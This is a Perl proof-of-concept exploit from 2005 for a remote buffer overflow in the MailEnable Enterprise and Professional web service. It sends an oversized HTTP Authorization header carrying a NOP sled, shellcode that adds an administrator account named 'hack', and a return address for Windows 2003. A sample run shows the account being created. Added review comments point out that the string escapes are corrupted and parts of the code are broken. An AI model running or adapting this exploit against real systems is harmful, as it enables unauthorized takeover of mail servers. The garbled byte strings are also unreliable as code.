
# Title : MailEnable Enterprise & Professional https Remote BoF Exploit
# Published : 2005-04-25
# Author : CorryL


#!/usr/bin/perl
# This tool is to be considered for educational purposes only
#
# 
#-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-
#-=[                                                               ]=-
#-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-
#-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-
#
#[+]Connecting to 127.0.0.1
#[+]Sending Evil Request
#[+]Creating Administrator User
#Connect to 127.0.0.1 Using User (hack) Pass (hack)
#
#D:Documents and SettingsAdministratorDesktopprova bofmailenable-bug+exploit
#>net users
#
#Account utente per \SERVER
#
#-------------------------------------------------------------------------------
#__vmware_user__          Administrator            ASPNET
#Guest                    hack                     IME_ADMIN
#IME_USER                 IUSR_SERVER              IWAM_SERVER
#SUPPORT_388945a0
#Esecuzione comando riuscita.
#
#
#Greatz All Users & Friends on irc.xoned.net #x0n3-h4ck


use IO::Socket; 
# NOTE(review): the string escapes throughout this listing appear to have
# lost their backslashes during extraction (e.g. "x6c", "n", "rn"), so the
# byte values below are not what the original source contained and the
# script is not runnable as shown.
$ret = "x6cx36xb7"; #RET For Win2003
$nop = "x90"x24;
#win32_adduser -  PASS=hack EXITFUNC=thread USER=hack Size=240 Encoder=PexFnstenvSub http://metasploit.com
# Payload string, described only by the author's comment above; its
# contents cannot be interpreted from this listing (see the note on escapes).
my $shellcode =
"x33xc9x83xe9xcaxd9xeexd9x74x24xf4x5bx81x73x13xc7".
"x7ex10xf5x83xebxfcxe2xf4x3bx96x56xf5xc7x7ex9bxb0".
"xfbxf5x6cxf0xbfx7fxffx7ex88x66x9bxaaxe7x7fxfbx16".
"xe9x37x9bxc1x4cx7fxfexc4x07xe7xbcx71x07x0ax17x34".
"x0dx73x11x37x2cx8ax2bxa1xe3x7ax65x16x4cx21x34xf4".
"x2cx18x9bxf9x8cxf5x4fxe9xc6x95x9bxe9x4cx7fxfbx7c".
"x9bx5ax14x36xf6xbex74x7ex87x4ex95x35xbfx71x9bxb5".
"xcbxf5x60xe9x6axf5x78xfdx2ex75x10xf5xc7xf5x50xc1".
"xc2x02x10xf5xc7xf5x78xc9x98x4fxe6x95x91x95x1dx9d".
"x28xb0xf0x95xafxe6xeex7fxc9x29xefx12x2fx90xefx0a".
"x38x1dx7dx91xe9x1bx68x90xe7x51x73xd5xa9x1bx64xd5".
"xb2x0dx75x87xe7x16x71x96xacx5ex78x94xa4x15x30xda".
"x86x3ax54xd5xe1x58x30x9bxa2x0ax30x99xa8x1dx71x99".
"xa0x0cx7fx80xb7x5ex51x91xaax17x7ex9cxb4x0ax62x94".
"xb3x11x62x86xe7x16x71x96xacx5ex3fxb4x83x3ax10xf5";

# NOTE(review): %args is passed flattened (as a list) rather than as a
# reference, so as written getopts does not appear to populate %args at all.
use Getopt::Std; getopts('h:', %args);


# Target host comes solely from the -h option.
if (defined($args{'h'})) { $host = $args{'h'}; }

# Banner goes to STDERR so it does not mix with the progress output on STDOUT.
print STDERR "n-=[MailEnable (Enterprise & Professional) HTTPS remote BoF exploit]=-n";
print STDERR "-=[                                                               ]=-n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-nn";

# Without a host there is nothing to do; Usage() prints help and exits.
if (!defined($host)) {
Usage();
}

# Request layout: a single HTTP/1.0 GET whose Authorization header carries
# nop sled + payload + return address instead of credentials. From a
# defender's view this is the observable artifact: an unusually long,
# non-base64 Authorization value arriving on TCP port 8080.
$bof = $nop.$shellcode.$ret;
$ric = "GET / HTTP/1.0rn";
$ric2 = "Authorization: $bofrnrn";
$richiesta = $ric.$ric2;
print "[+]Connecting to $hostn";
sleep 2;
# Indirect-object call syntax; IO::Socket::INET->new(...) is the modern form.
# The port is hard-coded to 8080 regardless of the "HTTPS" in the title.
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 8080,
                                Proto => 'tcp');
                                # die without a message when the connect fails
                                die unless $socket;
                                print "[+]Sending Evil Requestn";
                                sleep 2;
                                # The whole request is written in one shot; the
                                # response, if any, is never read.
                                print $socket "$richiesta";
                                # These lines only report the author's expected
                                # outcome; nothing on the socket is checked.
                                print "[+]Creating Administrator Usern";
                                print "Connect to $host Using User (hack) Pass (hack)n";
                                
                               
# Bare close acts on the currently selected filehandle (STDOUT), not on
# $socket; the socket itself is released when the process exits.
close;

sub Usage {
    # Print the command-line help to STDERR, then stop the program.
    # The help text is reproduced exactly as the author wrote it.
    my $help_text = "Usage:
-h Victim host.nn";
    print {*STDERR} $help_text;
    exit;
}
